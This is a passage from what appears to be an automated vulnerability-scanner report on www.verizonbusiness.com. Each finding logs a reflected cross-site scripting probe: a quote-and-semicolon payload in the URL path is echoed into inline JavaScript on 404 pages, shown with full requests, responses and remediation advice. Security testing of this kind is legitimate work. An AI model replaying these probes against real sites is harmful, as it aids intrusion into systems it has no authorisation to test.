hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itba539";f452eb4f7f1/data-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.119. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d5c2'%3b07e07d54884 was submitted in the REST URL parameter 3. This input was echoed as 3d5c2';07e07d54884 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/data-center3d5c2'%3b07e07d54884/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43037
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/data-center3d5c2';07e07d54884/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.120. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70725"%3ba036c8c8520 was submitted in the REST URL parameter 3. This input was echoed as 70725";a036c8c8520 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/data-center70725"%3ba036c8c8520/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43039
Date: Wed, 17 Nov 2010 00:40:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/data-center70725";a036c8c8520/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.121. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc6c9"%3b353a9d1eb2b was submitted in the REST URL parameter 1. This input was echoed as bc6c9";353a9d1eb2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsbc6c9"%3b353a9d1eb2b/it/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsbc6c9";353a9d1eb2b/it/managed-apps/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.122. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 161dc'%3beb37a86364e was submitted in the REST URL parameter 1. This input was echoed as 161dc';eb37a86364e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products161dc'%3beb37a86364e/it/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:18 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40648
Date: Wed, 17 Nov 2010 00:40:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products161dc';eb37a86364e/it/managed-apps/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.123. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a514'%3b26e8b3c91fb was submitted in the REST URL parameter 2. This input was echoed as 6a514';26e8b3c91fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it6a514'%3b26e8b3c91fb/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42313
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it6a514';26e8b3c91fb/managed-apps/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.124. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c10"%3bcc7d5206c0b was submitted in the REST URL parameter 2. This input was echoed as 72c10";cc7d5206c0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it72c10"%3bcc7d5206c0b/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:36 GMT
Content-Type: text/html
Content-Length: 42315
Date: Wed, 17 Nov 2010 00:40:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it72c10";cc7d5206c0b/managed-apps/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.125. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a3a1"%3bf6e6f98e7f6 was submitted in the REST URL parameter 3. This input was echoed as 1a3a1";f6e6f98e7f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps1a3a1"%3bf6e6f98e7f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43039
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps1a3a1";f6e6f98e7f6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.126. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e31c'%3b993aaf8a816 was submitted in the REST URL parameter 3. This input was echoed as 6e31c';993aaf8a816 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps6e31c'%3b993aaf8a816/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43039
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps6e31c';993aaf8a816/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.127. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf1e"%3bd9c8c1a9735 was submitted in the REST URL parameter 1. This input was echoed as adf1e";d9c8c1a9735 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsadf1e"%3bd9c8c1a9735/it/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsadf1e";d9c8c1a9735/it/managed-apps/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.128. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a16'%3beba3fdc32e6 was submitted in the REST URL parameter 1. This input was echoed as d2a16';eba3fdc32e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd2a16'%3beba3fdc32e6/it/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsd2a16';eba3fdc32e6/it/managed-apps/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.129. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd659'%3b0e2940ada39 was submitted in the REST URL parameter 2. This input was echoed as cd659';0e2940ada39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itcd659'%3b0e2940ada39/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:38 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42331
Date: Wed, 17 Nov 2010 00:40:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itcd659';0e2940ada39/managed-apps/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.130. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1aac"%3be8b940f9cf5 was submitted in the REST URL parameter 2. This input was echoed as d1aac";e8b940f9cf5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itd1aac"%3be8b940f9cf5/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itd1aac";e8b940f9cf5/managed-apps/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.131. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acab6'%3b674b2b76631 was submitted in the REST URL parameter 3. This input was echoed as acab6';674b2b76631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-appsacab6'%3b674b2b76631/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:11 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
